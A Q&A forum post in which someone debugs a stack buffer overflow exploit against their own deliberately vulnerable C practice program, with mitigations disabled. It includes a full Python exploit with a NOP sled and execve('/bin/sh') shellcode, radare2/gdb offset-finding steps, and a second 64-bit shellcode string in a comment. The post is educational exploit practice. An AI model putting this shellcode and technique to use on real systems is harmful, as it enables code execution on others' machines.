# Illegal instruction fault in stack based buffer overflow

Tags: radare2, c, gdb, python, buffer-overflow

I wrote this short C program to practice buffer overflow exploits:

```
#include <stdio.h>
#include <string.h>
#include <stddef.h>
#include <inttypes.h>

char *decode(char *s){
  for(int i = 0; i < strlen(s); i++){
    s[i] ^= 0x15;
  }
  return s;
}

void get_secret(int argc, char *argv[]){

  uint32_t eip_addr;
  char secret[] = "}aaef/::lz`a`;wp:qDb!b,BrMvD";
  char buffer[100];

  if(argc > 1){
    strcpy(buffer, argv[1]);
  }else{
    scanf("%s", buffer);
  }

  printf("You entered: %s\n\n", buffer);

  if(strcmp(buffer, secret) == 0){
    printf("Passwords match!\n");
    printf("Here is the secret message: %s\n", decode(secret));
  }else{
    printf("Get the f!@# out of here!\n");
    asm volatile("1: lea 1b, %0;": "=a"(eip_addr));
    printf("EIP address:  %" PRIx32 "; %" PRIu32 " bytes from main start\n",
       eip_addr,eip_addr - (uint32_t)get_secret);
  }
}
int main(int argc, char *argv[]){  
  printf("Welcome to the simple verifier!\n");
  printf("Please enter your password: ");

  get_secret(argc, argv);

  return 0;
}
```

I disable `ASLR` and compile it with `NX`, `PIE`, and `CANARY` disabled:

```
echo 0 > /proc/sys/kernel/randomize_va_space
gcc -m32 -g -no-pie -fno-stack-protector -z execstack overflow.c -o overflow
```

Using `r2`, `ragg2` and `rarun2`, I find where I can overwrite the return address of `get_secret()`:

```
~$ ragg2 -P 200 -r > pattern.txt
~$ echo "#!/usr/bin/rarun2" > profile.rr2 && echo "stdin=./pattern.txt" >> profile.rr2
~$ r2 -r profile.rr2 -d overflow
[0xf7795a20]> dc
EIP address:  804930b; 257 bytes from main start
child stopped with signal 11
[+] SIGNAL 11 errno=0 addr=0x41784141 code=1 ret=0
[0x41784141]> wopO 0x41784141
145
[0x41784141]>
```

So, now I know exactly how big my payload must be to get to the return address, 145 bytes. Now I find an address to point to on the stack using `gdb`:

```
~$ gdb overflow_exe -q
gdb-peda$ b 20
gdb-peda$ b 25
gdb-peda$ r $(python -c 'print "A"*145+"B"*4')
gdb-peda$ c
gdb-peda$ x/200x $esp
0xffffd100: 0x39    0x25    0xfe    0xf7    0x00    0x00    0x00    0x00
0xffffd108: 0x7d    0xc5    0xe5    0x41    0x41    0x41    0x41    0x41
0xffffd110: 0x41    0x41    0x41    0x41    0x41    0x41    0x41    0x41
0xffffd118: 0x41    0x41    0x41    0x41    0x41    0x41    0x41    0x41
0xffffd120: 0x41    0x41    0x41    0x41    0x41    0x41    0x41    0x41
0xffffd128: 0x41    0x41    0x41    0x41    0x41    0x41    0x41    0x41
0xffffd130: 0x41    0x41    0x41    0x41    0x41    0x41    0x41    0x41
0xffffd138: 0x41    0x41    0x41    0x41    0x41    0x41    0x41    0x41
0xffffd140: 0x41    0x41    0x41    0x41    0x41    0x41    0x41    0x41
0xffffd148: 0x41    0x41    0x41    0x41    0x41    0x41    0x41    0x41
0xffffd150: 0x41    0x41    0x41    0x41    0x41    0x41    0x41    0x41
0xffffd158: 0x41    0x41    0x41    0x41    0x41    0x41    0x41    0x41
0xffffd160: 0x41    0x41    0x41    0x41    0x41    0x41    0x41    0x41
0xffffd168: 0x41    0x41    0x41    0x41    0x41    0x41    0x41    0x41
0xffffd170: 0x41    0x41    0x41    0x41    0x41    0x41    0x41    0x41
0xffffd178: 0x41    0x41    0x41    0x41    0x41    0x41    0x41    0x41
0xffffd180: 0x41    0x41    0x41    0x41    0x41    0x41    0x41    0x41
0xffffd188: 0x41    0x41    0x41    0x41    0x41    0x41    0x41    0x41
0xffffd190: 0x41    0x41    0x41    0x41    0x41    0x41    0x41    0x41
0xffffd198: 0x41    0x41    0x41    0x41    0x42    0x42    0x42    0x42
0xffffd1a0: 0x00    0x00    0x00    0x00    0x74    0xd2    0xff    0xff
0xffffd1a8: 0x80    0x28    0xe2    0xf7    0x55    0x93    0x04    0x08
0xffffd1b0: 0x02    0x00    0x00    0x00    0x74    0xd2    0xff    0xff
0xffffd1b8: 0x80    0xd2    0xff    0xff    0xe0    0xd1    0xff    0xff
0xffffd1c0: 0x00    0x00    0x00    0x00    0x02    0x00    0x00    0x00
gdb-peda$
```

I *should* be able to replace those `\x41`s with `\x90`s, append my shellcode to it, then some address on the stack on to the end of that, making my payload look something like this:

```
"\x90"*117 + </bin/sh shellcode> + <some address that's filled with \x90>
```

Using this logic, I picked an address in the middle on the NOPs, `0xffffd150`, and crafted the following python exploit:

```
#!/usr/bin/env python
import struct, os

#land in middle of NOPs
ret_addr = 0xffffd150

#shellcode -> 28 bytes
shell_code = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80"

#correct endianess
def conv(val):
    return struct.pack('<I', val)

# Build the exploit string
# 149 bytes to overwrite the ret addr total
# Need to take 28 bytes for the shellcode and 4 for the return addr
# 145 - 28 = 117
exp = "\x90"*117
exp += shell_code # at the ret addr (145 bytes) here
exp += conv(ret_addr)

print("Starting exploit")
os.system("./overflow_exe "+exp)
```

But...I keep getting an *Illegal instruction* fault:

```
~$ ./overflow_exploit.py 
Starting exploit
Welcome to the simple verifier!
Please enter your password: You entered: ���������������������������������������������������������������������������������������������������������������������1�Ph//shh/bin�����°
                 1�@̀P���

Get the f!@# out of here!
EIP address:  804930b; 257 bytes from main start
Illegal instruction
```

Back in `gdb` I can see the NOP sled, shellcode, and return address, all where they should be:

```
gdb-peda$ x/200x $esp
0xffffd120: 0xf7fe2539  0x00000000  0x90e5c57d  0x90909090
0xffffd130: 0x90909090  0x90909090  0x90909090  0x90909090
0xffffd140: 0x90909090  0x90909090  0x90909090  0x90909090
0xffffd150: 0x90909090  0x90909090  0x90909090  0x90909090
0xffffd160: 0x90909090  0x90909090  0x90909090  0x90909090
0xffffd170: 0x90909090  0x90909090  0x90909090  0x90909090
0xffffd180: 0x90909090  0x90909090  0x90909090  0x90909090
0xffffd190: 0x90909090  0x90909090  0x90909090  0x90909090
0xffffd1a0: 0x6850c031  0x68732f2f  0x69622f68  0x89e3896e
0xffffd1b0: 0xb0c289c1  0x3180cd0b  0x80cd40c0  0xffffd150
```

I'm at a loss.  I re-check the binary's security features, and NX is still disabled (which is the only reason I can think of to explain the shellcode eliciting an "Illegal instruction" fault):

```
gdb-peda$ checksec
CANARY    : disabled
FORTIFY   : disabled
NX        : disabled
PIE       : disabled
RELRO     : Partial
gdb-peda$
```

Why is my exploit throwing an `Illegal instruction` fault when all security features are disabled, and my shellcode is in the correct position on the stack?

I'm on Debian 9

Comment: Try to step instruction by instruction through `gdb` with the `si` (`stepi`) command. You will get a more accurate information about what does cause the problem. Also, use `layout next` a few time until you get the assembly displayed.

Comment: You can turn on core dumps and analyze where your return address lands. Stack addresses are not same when you run a binary under gdb and without it.

Comment: Following https://stackoverflow.com/a/17775966/4678883 managed to get the correct stack address (which was in fact different).  My shellcode executes but for some reason instead of spawning a shell, it interprets the remaining stack contents as a shell command. So if this is my argument:  `$(python -c 'print "\x90"*65 + "\x48\x31\xd2\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x50\x57\x48\x89\xe6\xb0\x3b\x0f\x05"+"A"*50+"\x50\xdc\xff\xff"')`, I get `sh: 1: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA���: not found`

Comment: What architecture are you running on ? Is it x86 or x86_64 ? 
If your running your shellcode on an x86_64 processor, the first instruction are :
`XOR        EAX, EAX
PUSH       RAX`
instead of (on x86_32) `XOR        EAX, EAX
PUSH       EAX`

Comment: I'm running X86_64 but the program was compiled as X86.